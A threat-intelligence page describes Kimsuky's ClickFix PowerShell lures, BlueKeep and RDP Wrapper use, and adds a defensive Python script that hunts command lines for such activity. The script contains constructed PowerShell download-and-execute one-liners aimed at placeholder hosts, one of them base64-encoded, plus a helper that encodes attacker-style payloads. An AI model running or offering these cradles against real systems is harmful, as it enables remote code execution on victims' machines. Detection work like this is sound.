Kimsuky's PebbleDash Campaign: PowerShell Attacks & RDP Bypass Tactics - #Kimsuky
The North Korean threat group Kimsuky (also tracked as Emerald Sleet and Velvet Chollima) has noticeably changed its tradecraft in recent cyber-espionage campaigns. It has adopted 'ClickFix' and 'ClickRegister' social-engineering lures, in which a page or document impersonating a trusted source instructs the victim to paste and run a PowerShell command themselves; the initial execution therefore needs no exploit and originates from the user's own session, which keeps it clear of attachment filtering. For remote access the group has exploited BlueKeep (CVE-2019-0708, the pre-authentication RDP vulnerability) and deployed the RDP Wrapper library, which unlocks concurrent RDP sessions on Windows editions that normally permit only one, alongside proxy malware that relays its traffic to keep that access quieter. Intrusions typically begin with spear-phishing emails carrying malicious attachments, and the payloads that follow include the PebbleDash backdoor, keyloggers and information stealers. Targets span government agencies, NGOs and media organisations on several continents, with South Korea the primary focus. The shift to user-executed PowerShell means detection has to lean on process-creation and script-block logging rather than on mail filtering alone, and awareness training should specifically cover the "paste this command to fix the problem" pattern.
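The ClickFix pattern described above leaves a fairly recognisable trace in process-creation telemetry: a `powershell.exe` command line combining a hidden window, an execution-policy bypass, a download cradle such as `irm ... | iex`, or the whole thing hidden behind `-EncodedCommand`. The following hunting script is an added example written for this page, not code from the original article or from any vendor report; it scores command lines (the CommandLine field of Sysmon Event ID 1 or Windows Security Event ID 4688) against those generic indicators and decodes any `-enc` argument before scoring, so a cradle inside the base64 still counts. The sample lines, the `example.invalid` URLs and the indicator weights and threshold are all constructed for this example and are not indicators from the campaign.

```python
"""Hunt process command lines for ClickFix-style PowerShell one-liners.

Added example, not code from the original page or from any vendor report.
Input shape: the CommandLine field of a process-creation event (Sysmon
Event ID 1 or Windows Security Event ID 4688). All sample lines, URLs,
weights and the threshold below are constructed for this example.
"""
import base64
import re

# Image check: only PowerShell invocations are scored in this example.
_PS_IMAGE = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")

# (name, weight, regex). The [a-z]* tails accept the abbreviated switch
# spellings PowerShell allows (-w, -win, -windowstyle; -ep, -exec, ...).
INDICATORS = [
    ("hidden_window", 2, re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:hidden|1)\b")),
    ("execution_policy_bypass", 1, re.compile(r"(?i)(?:^|\s)-e(?:p|x[a-z]*)\s+bypass\b")),
    ("no_profile", 1, re.compile(r"(?i)(?:^|\s)-nop[a-z]*\b")),
    ("encoded_command", 2, re.compile(r"(?i)(?:^|\s)-e(?:c|nc[a-z]*)?\s+[A-Za-z0-9+/=]{8,}")),
    ("download_cradle", 2, re.compile(
        r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
        r"downloadstring|downloadfile|start-bitstransfer)\b")),
]
SUSPICIOUS_THRESHOLD = 4  # tuning assumption: benign "-nop -w hidden -File x.ps1" scores 3

_ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument, or None.

    PowerShell expects base64 of the UTF-16LE script text; anything that
    fails base64 validation or UTF-16LE decoding is reported as None.
    """
    match = _ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(command_line):
    """Score one command line and return the matched indicators."""
    result = {"command_line": command_line, "indicators": [], "score": 0,
              "decoded_payload": None, "suspicious": False}
    if not _PS_IMAGE.search(command_line):
        return result
    decoded = decode_encoded_command(command_line)
    result["decoded_payload"] = decoded
    # Search the visible line plus the decoded payload, so a cradle that
    # only exists inside -enc is still attributed to this event.
    haystack = command_line if decoded is None else command_line + "\n" + decoded
    for name, weight, pattern in INDICATORS:
        if pattern.search(haystack):
            result["indicators"].append(name)
            result["score"] += weight
    result["suspicious"] = result["score"] >= SUSPICIOUS_THRESHOLD
    return result


def hunt(command_lines):
    """Return the analysis records that crossed the threshold."""
    return [r for r in map(analyze_command_line, command_lines) if r["suspicious"]]


def _encode_for_powershell(script):
    """Build a -enc argument the way an attacker would (constructed payload)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry; nothing here is a real campaign indicator.
SAMPLE_COMMAND_LINES = [
    # routine administrative invocation, should not alert
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    # ClickFix-style line a victim is told to paste into the Win+R box
    'powershell.exe -w hidden -ep bypass -c "irm http://example.invalid/captcha | iex"',
    # the same cradle hidden behind -enc
    "powershell.exe -nop -w 1 -enc " + _encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    # not PowerShell at all, skipped by the image check
    r"C:\Windows\System32\cmd.exe /c dir",
]

if __name__ == "__main__":
    for record in hunt(SAMPLE_COMMAND_LINES):
        print(record["score"], record["indicators"])
        if record["decoded_payload"]:
            print("  decoded:", record["decoded_payload"])
```

The weights are deliberately additive rather than a single signature, because every one of these switches appears in legitimate administration on its own; it is the combination of a hidden window, a bypass and a network cradle in one interactive launch that is characteristic of a pasted lure. Pairing this with the parent process (explorer.exe launching PowerShell directly is what a Win+R paste looks like) sharpens it further, but that field is outside what this example consumes.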